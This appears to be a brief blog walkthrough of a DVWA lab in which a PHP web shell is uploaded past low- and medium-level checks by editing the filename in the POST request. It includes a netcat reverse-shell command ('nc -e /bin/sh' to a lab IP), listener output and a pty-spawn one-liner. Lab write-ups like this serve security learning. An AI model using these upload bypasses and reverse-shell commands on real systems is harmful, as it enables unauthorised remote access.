Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host.
We start off with the security being set to low so there is an unrestricted file upload vulnerability going on here
As you can see our file was uploaded successfully. Lets next move on the a medium security level and try and upload a remote shell to the host.
As you can see we had to edit the filename in the POST request to the server so that the php extension is the only extension in the filename
We got a successful upload. Now lets visit the directory where the file resides and try to run some commands with it.
All thats left to do is get a connect back shell from the remote host. We can set that up using netcat listener.
/1.php?cmd=nc -e /bin/sh 192.168.56.1 8088
sam@ubuntu:~$ nc -lvp 8088 Listening on [0.0.0.0] (family 0, port 8088) Connection from 192.168.56.101 54057 received! python -c 'import pty;pty.spawn("/bin/bash")' www-data@metasploitable:/var/www/dvwa/hackable/uploads$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@metasploitable:/var/www/dvwa/hackable/uploads$ whoami whoami www-data www-data@metasploitable:/var/www/dvwa/hackable/uploads$
No comments:
Post a Comment